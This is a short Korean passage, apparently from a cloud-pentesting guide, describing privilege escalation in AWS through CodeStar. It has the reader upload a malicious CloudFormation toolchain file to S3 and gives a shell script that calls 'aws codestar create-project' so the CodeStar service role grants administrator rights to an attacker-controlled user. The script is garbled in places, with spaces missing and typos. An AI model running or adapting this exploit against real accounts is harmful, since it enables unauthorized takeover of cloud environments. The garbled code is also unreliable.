이 권한을 사용하면 codestar IAM 역할을 악용하여임의의 작업을 cloudformation 템플릿을 통해 수행할 수 있습니다.
이를 이용하려면 공격받는 계정에서 접근 가능한 S3 버킷을 생성해야 합니다. toolchain.json이라는 파일을 업로드하세요. 이 파일에는 cloudformation 템플릿 악용이 포함되어야 합니다. 다음 템플릿을 사용하여 귀하의 제어 하에 있는 사용자에게 관리 정책을 설정하고 관리자 권한을 부여할 수 있습니다:
PROJECT_NAME="supercodestar"# Crecte the source JSON## In this JSON the bucket and key (path) to the empry.zip file is usedSOURCE_CODE_PATH="/tmp/surce_code.json"SOURCE_CODE="[{\"source\": {\"s3\": {\"bucketName\": \"privesc\",\"bucketKey\": \"empty.zip\"}},\"destination\": {\"codeCommit\": {\"name\": \"$PROJECT_NAME\"}}}]"printf"$SOURCE_CODE"> $SOURCE_CODE_PATH# Create the toolchain JSON## In this JSON the bucket and key (path) to the toolchain.json file is usedTOOLCHAIN_PATH="/tmp/tool_chain.json"TOOLCHAIN="{\"source\": {\"s3\": {\"bucketName\": \"privesc\",\"bucketKey\": \"toolchain.json\"}},\"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"}"printf"$TOOLCHAIN"> $TOOLCHAIN_PATH# Create the codestar project that will use the cloudformation epxloit to privescawscodestarcreate-project \--name $PROJECT_NAME \--id $PROJECT_NAME \--source-code file://$SOURCE_CODE_PATH \--toolchain file://$TOOLCHAIN_PATH